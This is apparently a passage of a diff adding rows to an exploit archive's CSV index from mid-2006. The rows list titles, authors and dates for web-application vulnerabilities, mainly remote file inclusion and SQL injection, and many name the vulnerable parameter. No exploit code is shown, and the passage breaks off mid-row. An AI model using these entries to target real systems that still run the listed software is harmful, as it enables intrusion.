+1851,exploits/php/webapps/1851.txt,"gnopaste 0.5.3 - 'common.php' Remote File Inclusion",2006-05-30,SmokeZ,webapps,php, +1853,exploits/php/webapps/1853.php,"pppBlog 0.3.8 - System Disclosure",2006-05-31,rgod,webapps,php, +1854,exploits/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)",2006-05-31,Kacper,webapps,php, +1855,exploits/php/webapps/1855.txt,"metajour 2.1 - 'system_path' Remote File Inclusion",2006-05-31,Kacper,webapps,php, +1857,exploits/php/webapps/1857.pl,"TinyPHP Forum 3.6 - 'profile.php' Remote Code Execution",2006-06-01,Hessam-x,webapps,php, +1858,exploits/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - 'ROOT_PATH' Remote File Inclusion",2006-06-01,Kacper,webapps,php, +1859,exploits/asp/webapps/1859.html,"aspWebLinks 2.0 - SQL Injection / Admin Pass Change",2006-06-01,ajann,webapps,asp, +1860,exploits/php/webapps/1860.txt,"Bytehoard 2.1 - 'server.php' Remote File Inclusion",2006-06-01,beford,webapps,php, +1861,exploits/php/webapps/1861.txt,"Redaxo 3.2 - 'INCLUDE_PATH' Remote File Inclusion",2006-06-02,beford,webapps,php, +1863,exploits/php/webapps/1863.txt,"Igloo 0.1.9 - 'Wiki.php' Remote File Inclusion",2006-06-02,Kacper,webapps,php, +1864,exploits/php/webapps/1864.txt,"ashNews 0.83 - 'pathtoashnews' Remote File Inclusion",2006-06-02,Kacper,webapps,php, +1865,exploits/php/webapps/1865.txt,"Informium 0.12.0 - 'common-menu.php' Remote File Inclusion",2006-06-02,Kacper,webapps,php, +1866,exploits/php/webapps/1866.txt,"PHP-Nuke 7.9 Final - 'phpbb_root_path' Remote File Inclusions",2006-06-02,ddoshomo,webapps,php, +1868,exploits/php/webapps/1868.php,"PixelPost 1-5rc1-2 - Privilege Escalation",2006-06-03,rgod,webapps,php, +1869,exploits/php/webapps/1869.php,"DotClear 1.2.4 - 'prepend.php' Remote File Inclusion",2006-06-03,rgod,webapps,php, +1870,exploits/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,webapps,php, +1871,exploits/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - 'path' Remote File Inclusion",2006-06-03,Kacper,webapps,php, +1872,exploits/php/webapps/1872.txt,"CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion",2006-06-03,Kacper,webapps,php, +1873,exploits/asp/webapps/1873.txt,"ProPublish 2.0 - 'catid' SQL Injection",2006-06-03,FarhadKey,webapps,asp, +1874,exploits/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection",2006-06-03,rgod,webapps,php, +1875,exploits/php/webapps/1875.html,"FunkBoard CF0.71 - 'profile.php' Remote User Pass Change",2006-06-04,ajann,webapps,php, +1876,exploits/php/webapps/1876.pl,"SCart 2.0 - 'page' Remote Code Execution",2006-06-04,K-159,webapps,php, +1877,exploits/php/webapps/1877.php,"Claroline 1.7.6 - 'includePath' Remote Code Execution",2006-06-05,rgod,webapps,php, +1878,exploits/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,webapps,php, +1879,exploits/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - 'file_path' Remote File Inclusion",2006-06-05,Aesthetico,webapps,php, +1881,exploits/php/webapps/1881.txt,"DreamAccount 3.1 - 'da_path' Remote File Inclusion",2006-06-05,Aesthetico,webapps,php, +1882,exploits/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure",2006-06-05,DarkFig,webapps,php, +1883,exploits/php/webapps/1883.txt,"Wikiwig 4.1 - 'wk_lang.php' Remote File Inclusion",2006-06-06,Kacper,webapps,php, +1884,exploits/asp/webapps/1884.html,"myNewsletter 1.1.2 - 'adminLogin.asp' Authentication Bypass",2006-06-06,FarhadKey,webapps,asp, +1886,exploits/php/webapps/1886.txt,"OpenEMR 2.8.1 - 'fileroot' Remote File Inclusion",2006-06-07,Kacper,webapps,php, +1887,exploits/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - 'post.php' Remote File Inclusion",2006-06-07,Kacper,webapps,php, +1888,exploits/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - 'jpcache.php' Remote File Inclusion",2006-06-08,"Federico Fazzi",webapps,php, +1890,exploits/php/webapps/1890.txt,"CMS-Bandits 2.5 - 'spaw_root' Remote File Inclusion",2006-06-08,"Federico Fazzi",webapps,php, +1891,exploits/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - 'footer' Remote File Inclusion",2006-06-08,Kacper,webapps,php, +1892,exploits/php/webapps/1892.pl,"Guestex Guestbook 1.00 - 'email' Remote Code Execution",2006-06-08,K-sPecial,webapps,php, +1893,exploits/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - 'ASP' Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",webapps,asp, +1895,exploits/php/webapps/1895.txt,"empris r20020923 - 'phormationdir' Remote File Inclusion",2006-06-10,Kacper,webapps,php, +1896,exploits/php/webapps/1896.txt,"aePartner 0.8.3 - 'dir[data]' Remote File Inclusion",2006-06-10,Kacper,webapps,php, +1897,exploits/php/webapps/1897.txt,"phpOnDirectory 1.0 - Remote File Inclusion",2006-06-10,Kacper,webapps,php, +1898,exploits/php/webapps/1898.txt,"WebprojectDB 0.1.3 - 'INCDIR' Remote File Inclusion",2006-06-11,Kacper,webapps,php, +1899,exploits/php/webapps/1899.txt,"free QBoard 1.1 - 'qb_path' Remote File Inclusion",2006-06-11,Kacper,webapps,php, +1900,exploits/asp/webapps/1900.txt,"MaxiSepet 1.0 - 'link' SQL Injection",2006-06-11,nukedx,webapps,asp, +1901,exploits/php/webapps/1901.pl,"RCblog 1.03 - 'POST' Remote Command Execution",2006-06-11,Hessam-x,webapps,php, +1902,exploits/php/webapps/1902.txt,"AWF CMS 1.11 - 'spaw_root' Remote File Inclusion",2006-06-11,"Federico Fazzi",webapps,php, +1903,exploits/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",webapps,php, +1904,exploits/php/webapps/1904.php,"blur6ex 0.3.462 - 'ID' Admin Disclosure / Blind SQL Injection",2006-06-12,rgod,webapps,php, +1905,exploits/php/webapps/1905.txt,"DCP-Portal 6.1.x - 'root' Remote File Inclusion",2006-06-12,"Federico Fazzi",webapps,php, +1907,exploits/php/webapps/1907.txt,"aWebNews 1.5 - 'visview.php' Remote File Inclusion",2006-06-13,SpC-x,webapps,php, +1908,exploits/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - 'phpbb_root_path' File Inclusion",2006-06-13,Kacper,webapps,php, +1909,exploits/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution",2006-06-13,"Javier Olascoaga",webapps,php, +1912,exploits/php/webapps/1912.txt,"The Bible Portal Project 2.12 - 'destination' File Inclusion",2006-06-14,Kacper,webapps,php, +1913,exploits/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - 'template.php' File Inclusion",2006-06-14,"Federico Fazzi",webapps,php, +1914,exploits/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,webapps,php, +1916,exploits/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Remote File Inclusion",2006-06-15,"Andreas Sandblad",webapps,php, +1918,exploits/php/webapps/1918.php,"Bitweaver 1.3 - 'tmpImagePath' Attachment mod_mime",2006-06-15,rgod,webapps,php, +1919,exploits/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Remote File Inclusion",2006-06-16,K-159,webapps,php, +1920,exploits/php/webapps/1920.php,"Mambo 4.6rc1 - Weblinks Blind SQL Injection (1)",2006-06-17,rgod,webapps,php, +1921,exploits/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,webapps,php, +1922,exploits/php/webapps/1922.php,"Joomla! 1.0.9 - 'Weblinks' Blind SQL Injection",2006-06-17,rgod,webapps,php, +1923,exploits/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,webapps,php, +1925,exploits/php/webapps/1925.txt,"Indexu 5.0.1 - 'admin_template_path' Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,webapps,php, +1926,exploits/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Remote File Inclusion",2006-06-18,SnIpEr_SA,webapps,php, +1928,exploits/php/webapps/1928.txt,"IdeaBox 1.1 - 'gorumDir' Remote File Inclusion",2006-06-19,Kacper,webapps,php, +1929,exploits/php/webapps/1929.txt,"Micro CMS 0.3.5 - 'microcms_path' Remote File Inclusion",2006-06-19,CeNGiZ-HaN,webapps,php, +1930,exploits/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - SQL Injection",2006-06-19,EntriKa,webapps,asp, +1931,exploits/asp/webapps/1931.txt,"ASP Stats Generator 2.1.1 - SQL Injection",2006-06-19,"Hamid Ebadi",webapps,asp, +1932,exploits/php/webapps/1932.php,"Ultimate PHP Board 1.96 GOLD - Multiple Vulnerabilities",2006-06-20,"Michael Brooks",webapps,php, +1933,exploits/php/webapps/1933.txt,"BandSite CMS 1.1.1 - 'ROOT_PATH' Remote File Inclusion",2006-06-20,Kw3[R]Ln,webapps,php, +1934,exploits/php/webapps/1934.txt,"dotProject 2.0.3 - 'baseDir' Remote File Inclusion",2006-06-20,h4ntu,webapps,php, +1936,exploits/php/webapps/1936.txt,"SmartSite CMS 1.0 - 'root' Remote File Inclusion",2006-06-20,Archit3ct,webapps,php, +1938,exploits/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection (Perl)",2006-06-21,RusH,webapps,php, +1939,exploits/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection (PHP)",2006-06-21,RusH,webapps,php, +1941,exploits/php/webapps/1941.php,"Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)",2006-06-22,rgod,webapps,php, +1942,exploits/php/webapps/1942.txt,"ralf image Gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,webapps,php, +1943,exploits/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,webapps,php, +1945,exploits/php/webapps/1945.pl,"w-Agora 4.2.0 - 'inc_dir' Remote File Inclusion",2006-06-22,the_day,webapps,php, +1946,exploits/php/webapps/1946.php,"Jaws 0.6.2 - Search gadget SQL Injection",2006-06-23,rgod,webapps,php, +1948,exploits/php/webapps/1948.txt,"phpMySms 2.0 - 'ROOT_PATH' Remote File Inclusion",2006-06-24,Persian-Defacer,webapps,php, +1950,exploits/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - 'usercp.php' Create Admin",2006-06-25,Hessam-x,webapps,php, +1951,exploits/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Inclusion",2006-06-25,Kw3[R]Ln,webapps,php, +1952,exploits/php/webapps/1952.txt,"THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion",2006-06-25,Kw3[R]Ln,webapps,php, +1953,exploits/php/webapps/1953.pl,"DeluxeBB 1.07 - Remote Create Admin",2006-06-25,Hessam-x,webapps,php, +1954,exploits/php/webapps/1954.pl,"DreamAccount 3.1 - 'auth.api.php' Remote File Inclusion",2006-06-25,CrAsh_oVeR_rIdE,webapps,php, +1955,exploits/php/webapps/1955.txt,"Mambo Module CBSms 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,webapps,php, +1956,exploits/php/webapps/1956.txt,"Mambo Component Pearl 1.6 - Multiple Remote File Inclusions",2006-06-27,Kw3[R]Ln,webapps,php, +1957,exploits/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - 'forumid' SQL Injection",2006-06-27,simo64,webapps,php, +1959,exploits/php/webapps/1959.txt,"RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion",2006-06-28,marriottvn,webapps,php, +1960,exploits/php/webapps/1960.php,"Blog:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,webapps,php, +1961,exploits/php/webapps/1961.txt,"XOOPS myAds Module - 'lid' SQL Injection",2006-06-28,KeyCoder,webapps,php, +1963,exploits/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - '_CONF[path]' Remote File Inclusion",2006-06-29,Kw3[R]Ln,webapps,php, +1964,exploits/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,webapps,php, +1968,exploits/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) 1.34 - 'id' SQL Injection",2006-07-01,x128,webapps,php, +1969,exploits/php/webapps/1969.txt,"Stud.IP 1.3.0-2 - Multiple Remote File Inclusions",2006-07-01,"Hamid Ebadi",webapps,php, +1970,exploits/php/webapps/1970.txt,"Plume CMS 1.1.3 - 'dbinstall.php' Remote File Inclusion",2006-07-01,"Hamid Ebadi",webapps,php, +1971,exploits/php/webapps/1971.txt,"Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion",2006-07-01,OLiBekaS,webapps,php, +1974,exploits/php/webapps/1974.txt,"SmartSite CMS 1.0 - 'root' Multiple Remote File Inclusions",2006-07-01,CrAsh_oVeR_rIdE,webapps,php, +1975,exploits/php/webapps/1975.pl,"BXCP 0.3.0.4 - 'where' SQL Injection",2006-07-02,x23,webapps,php, +1981,exploits/php/webapps/1981.txt,"Mambo Module galleria 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,webapps,php, +1982,exploits/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,webapps,php, +1983,exploits/php/webapps/1983.txt,"MyPHP CMS 0.3 - 'domain' Remote File Inclusion",2006-07-05,Kw3[R]Ln,webapps,php, +1987,exploits/asp/webapps/1987.txt,"Hosting Controller 6.1 Hotfix 3.1 - Privilege Escalation",2006-07-06,"Soroush Dalili",webapps,asp, +1991,exploits/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution",2006-07-07,rgod,webapps,php, +1993,exploits/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure",2006-07-07,rgod,webapps,php, +1994,exploits/php/webapps/1994.txt,"Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,webapps,php, +1995,exploits/php/webapps/1995.txt,"Mambo Component com_forum 1.2.4RC3 - Remote File Inclusion",2006-07-08,h4ntu,webapps,php, +1996,exploits/php/webapps/1996.txt,"Sabdrimer PRO 2.2.4 - 'pluginpath' Remote File Inclusion",2006-07-09,A.nosrati,webapps,php, +1998,exploits/php/webapps/1998.pl,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (2)",2006-07-09,"Jacek Wlodarczyk",webapps,php, +2002,exploits/php/webapps/2002.pl,"EJ3 TOPo 2.2 - 'descripcion' Remote Command Execution",2006-07-10,Hessam-x,webapps,php, +2003,exploits/php/webapps/2003.txt,"SQuery 4.5 - 'gore.php' Remote File Inclusion",2006-07-10,SHiKaA,webapps,php, +2007,exploits/php/webapps/2007.php,"phpBB 3 - 'memberlist.php' SQL Injection",2006-07-13,rgod,webapps,php, +2008,exploits/php/webapps/2008.php,"Phorum 5 - 'pm.php' Arbitrary Local Inclusion",2006-07-13,rgod,webapps,php, +2009,exploits/php/webapps/2009.txt,"CzarNews 1.14 - 'tpath' Remote File Inclusion",2006-07-13,SHiKaA,webapps,php, +2010,exploits/php/webapps/2010.pl,"Invision Power Board 2.1 < 2.1.6 - SQL Injection (1)",2006-07-14,RusH,webapps,php, +2012,exploits/php/webapps/2012.php,"MyBulletinBoard (MyBB) 1.1.5 - 'CLIENT-IP' SQL Injection",2006-07-15,rgod,webapps,php, +2018,exploits/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - 'class.rich.php' Remote File Inclusion",2006-07-16,igi,webapps,php, +2019,exploits/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - 'm2f_root_path' Remote File Inclusion",2006-07-17,OLiBekaS,webapps,php, +2020,exploits/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,webapps,php, +2021,exploits/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,webapps,php, +2022,exploits/php/webapps/2022.txt,"Mambo Component ExtCalendar 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,webapps,php, +2023,exploits/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,webapps,php, +2024,exploits/php/webapps/2024.txt,"Mambo Component pc_cookbook 0.3 - Remote File Inclusion",2006-07-17,Matdhule,webapps,php, +2025,exploits/php/webapps/2025.txt,"Mambo Component perForms 1.0 - Remote File Inclusion",2006-07-17,endeneu,webapps,php, +2026,exploits/php/webapps/2026.txt,"Mambo Component com_hashcash 1.2.1 - Remote File Inclusion",2006-07-17,Matdhule,webapps,php, +2027,exploits/php/webapps/2027.txt,"Mambo Module HTMLArea3 1.5 - Remote File Inclusion",2006-07-17,Matdhule,webapps,php, +2028,exploits/php/webapps/2028.txt,"Mambo Component Sitemap 2.0.0 - Remote File Inclusion",2006-07-17,Matdhule,webapps,php, +2029,exploits/php/webapps/2029.txt,"Mambo Component pollxt 1.22.07 - Remote File Inclusion",2006-07-17,vitux,webapps,php, +2030,exploits/php/webapps/2030.txt,"Mambo Component MiniBB 1.5a - Remote File Inclusion",2006-07-17,Matdhule,webapps,php, +2032,exploits/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",webapps,php, +2033,exploits/php/webapps/2033.pl,"Invision Power Board 2.1 < 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",webapps,php, +2035,exploits/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Arbitrary File Upload",2006-07-18,rgod,webapps,php, +2036,exploits/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,webapps,php, +2046,exploits/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,webapps,php, +2049,exploits/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - 'SD_DIR' Remote File Inclusion",2006-07-20,Aesthetico,webapps,php, +2050,exploits/php/webapps/2050.php,"LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,webapps,php, +2058,exploits/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Remote File Inclusion",2006-07-22,"Virangar Security",webapps,php, +2060,exploits/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,webapps,php, +2062,exploits/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",webapps,php, +2063,exploits/php/webapps/2063.txt,"ArticlesOne 07232006 - 'page' Remote File Inclusion",2006-07-23,CyberLord,webapps,php, +2064,exploits/php/webapps/2064.txt,"Mambo Component Mam-Moodle alpha - Remote File Inclusion",2006-07-23,jank0,webapps,php, +2066,exploits/php/webapps/2066.txt,"Mambo Component multibanners 1.0.1 - Remote File Inclusion",2006-07-23,Blue|Spy,webapps,php, +2068,exploits/php/webapps/2068.php,"X7 Chat 2.0.4 - 'old_prefix' Blind SQL Injection",2006-07-24,rgod,webapps,php, +2069,exploits/php/webapps/2069.txt,"Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,webapps,php, +2071,exploits/php/webapps/2071.php,"Etomite CMS 0.6.1 - 'Username' SQL Injection (mq = off)",2006-07-25,rgod,webapps,php, +2072,exploits/php/webapps/2072.php,"Etomite CMS 0.6.1 - 'rfiles.php' Remote Command Execution",2006-07-25,rgod,webapps,php, +2077,exploits/php/webapps/2077.txt,"WMNews 0.2a - 'base_datapath' Remote File Inclusion",2006-07-27,uNfz,webapps,php, +2078,exploits/php/webapps/2078.txt,"Mambo Component 'com_a6mambohelpdesk' 18RC1 - Remote File Inclusion",2006-07-27,Dr.Jr7,webapps,php, +2081,exploits/php/webapps/2081.txt,"Portail PHP 1.7 - 'chemin' Remote File Inclusion",2006-07-27,"Mehmet Ince",webapps,php, +2083,exploits/php/webapps/2083.txt,"Mambo Component Security Images 3.0.5 - Remote File Inclusion",2006-07-28,Drago84,webapps,php, +2084,exploits/php/webapps/2084.txt,"Mambo Component MGM 0.95r2 - Remote File Inclusion",2006-07-28,"A-S-T TEAM",webapps,php, +2085,exploits/php/webapps/2085.txt,"Mambo Component 'com_colophon' 1.2 - Remote File Inclusion",2006-07-29,Drago84,webapps,php, +2086,exploits/php/webapps/2086.txt,"Mambo Component mambatStaff 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,webapps,php, +2087,exploits/php/webapps/2087.php,"vbPortal 3.0.2 < 3.6.0 b1 - 'cookie' Remote Code Execution",2006-07-29,r00t,webapps,php, +2088,exploits/php/webapps/2088.php,"ATutor 1.5.3.1 - 'links' Blind SQL Injection",2006-07-30,rgod,webapps,php, +2089,exploits/php/webapps/2089.txt,"Mambo Component User Home Pages 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",webapps,php, +2090,exploits/php/webapps/2090.txt,"Joomla! Component com_bayesiannaivefilter 1.1 - Remote File Inclusion",2006-07-30,Pablin77,webapps,php, +2092,exploits/php/webapps/2092.txt,"Joomla! Component LMO 1.0b2 - Remote File Inclusion",2006-07-30,vitux,webapps,php, +2095,exploits/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 - 'pathtohomedir' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,webapps,php, +2096,exploits/php/webapps/2096.txt,"MyNewsGroups 0.6b - 'myng_root' Remote Inclusion",2006-07-31,"Philipp Niedziela",webapps,php, +2097,exploits/php/webapps/2097.txt,"NewsLetter 3.5 - 'NL_PATH' Remote File Inclusion",2006-08-01,SHiKaA,webapps,php, +2098,exploits/php/webapps/2098.txt,"TSEP 0.942 - 'copyright.php' Remote File Inclusion",2006-08-01,"Philipp Niedziela",webapps,php, +2099,exploits/php/webapps/2099.txt,"WoW Roster 1.5.1 - 'subdir' Remote File Inclusion",2006-08-01,skulmatic,webapps,php, +2100,exploits/php/webapps/2100.txt,"phpAuction 2.1 - 'phpAds_path' Remote File Inclusion",2006-08-01,"Philipp Niedziela",webapps,php, +2101,exploits/php/webapps/2101.txt,"newsReporter 1.1 - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",webapps,php, +2102,exploits/php/webapps/2102.txt,"Voodoo chat 1.0RC1b - 'file_path' Remote File Inclusion",2006-08-01,SHiKaA,webapps,php, +2103,exploits/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",webapps,php, +2104,exploits/php/webapps/2104.txt,"k_fileManager 1.2 - 'dwl_include_path' Remote File Inclusion",2006-08-01,SHiKaA,webapps,php, +2105,exploits/php/webapps/2105.php,"XMB 1.9.6 - 'mq=off' 'u2uid' SQL Injection",2006-08-01,rgod,webapps,php, +2109,exploits/php/webapps/2109.txt,"WoW Roster 1.70 - '/lib/phpBB.php' Remote File Inclusion",2006-08-02,|peti,webapps,php, +2110,exploits/php/webapps/2110.pm,"TWiki 4.0.4 - Configure Script Remote Code Execution (Metasploit)",2006-08-02,"David Maciejak",webapps,php, +2113,exploits/php/webapps/2113.txt,"SaveWeb Portal 3.4 - 'SITE_Path' Remote File Inclusion",2006-08-02,"Mehmet Ince",webapps,php, +2114,exploits/php/webapps/2114.html,"TinyPHP Forum 3.6 - 'makeAdmin' Remote Admin Maker",2006-08-02,SirDarckCat,webapps,php, +2115,exploits/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - 'subd' Remote File Inclusion",2006-08-02,beford,webapps,php, +2116,exploits/php/webapps/2116.txt,"TSEP 0.942 - 'colorswitch.php' Remote File Inclusion",2006-08-02,beford,webapps,php, +2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,webapps,php, +2118,exploits/php/webapps/2118.php,"MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections",2006-08-07,rgod,webapps,php, +2119,exploits/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,webapps,php, +2120,exploits/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,webapps,php, +2121,exploits/php/webapps/2121.txt,"Torbstoff News 4 - 'pfad' Remote File Inclusion",2006-08-07,SHiKaA,webapps,php, +2122,exploits/php/webapps/2122.txt,"ME Download System 1.3 - 'header.php' Remote File Inclusion",2006-08-07,"Philipp Niedziela",webapps,php, +2123,exploits/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - 'tpl.inc.php' Remote File Inclusion",2006-08-07,SirDarckCat,webapps,php, +2125,exploits/php/webapps/2125.txt,"Joomla! Component JD-Wiki 1.0.2 - Remote File Inclusion",2006-08-07,jank0,webapps,php, +2127,exploits/php/webapps/2127.txt,"ModernBill 1.6 - 'config.php' Remote File Inclusion",2006-08-07,Solpot,webapps,php, +2128,exploits/php/webapps/2128.txt,"SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,webapps,php, +2129,exploits/php/webapps/2129.txt,"SAPID Blog Beta 2 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,webapps,php,80 +2130,exploits/php/webapps/2130.txt,"SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,webapps,php,80 +2131,exploits/php/webapps/2131.txt,"SAPID Shop 1.2 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,webapps,php,80 +2132,exploits/php/webapps/2132.txt,"phpAutoMembersArea 3.2.5 - 'installed_config_file' Remote File Inclusion",2006-08-07,"Philipp Niedziela",webapps,php, +2133,exploits/php/webapps/2133.txt,"Simple CMS - Administrator Authentication Bypass",2006-08-07,daaan,webapps,php, +2134,exploits/php/webapps/2134.txt,"phpCC 4.2 Beta - 'base_dir' Remote File Inclusion",2006-08-07,Solpot,webapps,php, +2135,exploits/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - 'abs_path' Remote File Inclusion",2006-08-07,"Philipp Niedziela",webapps,php, +2137,exploits/php/webapps/2137.txt,"QuestCMS - 'main.php' Remote File Inclusion",2006-08-07,Crackers_Child,webapps,php, +2138,exploits/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - SQL Injection",2006-08-07,ASIANEAGLE,webapps,asp, +2139,exploits/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - 'Core.php' Remote File Inclusion",2006-08-07,Minion,webapps,php,80 +2141,exploits/php/webapps/2141.txt,"Visual Events Calendar 1.1 - 'cfg_dir' Remote File Inclusion",2006-08-07,"Mehmet Ince",webapps,php, +2142,exploits/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",webapps,php, +2143,exploits/php/webapps/2143.pl,"TWiki 4.0.4 - 'configure' Remote Command Execution",2006-08-07,"Javier Olascoaga",webapps,php, +2146,exploits/php/webapps/2146.txt,"docpile:we 0.2.2 - 'INIT_PATH' Remote File Inclusion",2006-08-08,"Mehmet Ince",webapps,php, +2148,exploits/php/webapps/2148.txt,"phNNTP 1.3 - 'article-raw.php' Remote File Inclusion",2006-08-08,Drago84,webapps,php,80 +2149,exploits/php/webapps/2149.txt,"Hitweb 4.2.1 - 'REP_INC' Remote File Inclusion",2006-08-08,Drago84,webapps,php, +2150,exploits/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,webapps,asp, +2151,exploits/php/webapps/2151.txt,"Cwfm 0.9.1 - 'Language' Remote File Inclusion",2006-08-08,"Philipp Niedziela",webapps,php,80 +2153,exploits/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",webapps,php, +2154,exploits/php/webapps/2154.txt,"PgMarket 2.2.3 - 'CFG[libdir]' Remote File Inclusion",2006-08-09,"Mehmet Ince",webapps,php,80 +2155,exploits/php/webapps/2155.txt,"See-Commerce 1.0.625 - 'owimg.php3' Remote File Inclusion",2006-08-09,Drago84,webapps,php, +2157,exploits/php/webapps/2157.txt,"Tagger Luxury Edition - 'BBCodeFile' Remote File Inclusion",2006-08-09,Morgan,webapps,php, +2158,exploits/php/webapps/2158.txt,"TinyWebGallery 1.5 - 'image' Remote File Inclusion",2006-08-09,"Mehmet Ince",webapps,php, +2159,exploits/php/webapps/2159.pl,"PHPMyRing 4.2.0 - 'view_com.php' SQL Injection",2006-08-09,simo64,webapps,php,80 +2161,exploits/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - 'rootpath' Remote Code Execution",2006-08-10,simo64,webapps,php,80 +2163,exploits/php/webapps/2163.txt,"PHPWCMS 1.1-RC4 - 'spaw' Remote File Inclusion",2006-08-10,Morgan,webapps,php,80 +2165,exploits/php/webapps/2165.txt,"Spaminator 1.7 - 'page' Remote File Inclusion",2006-08-10,Drago84,webapps,php,80 +2166,exploits/php/webapps/2166.txt,"Thatware 0.4.6 - 'ROOT_PATH' Remote File 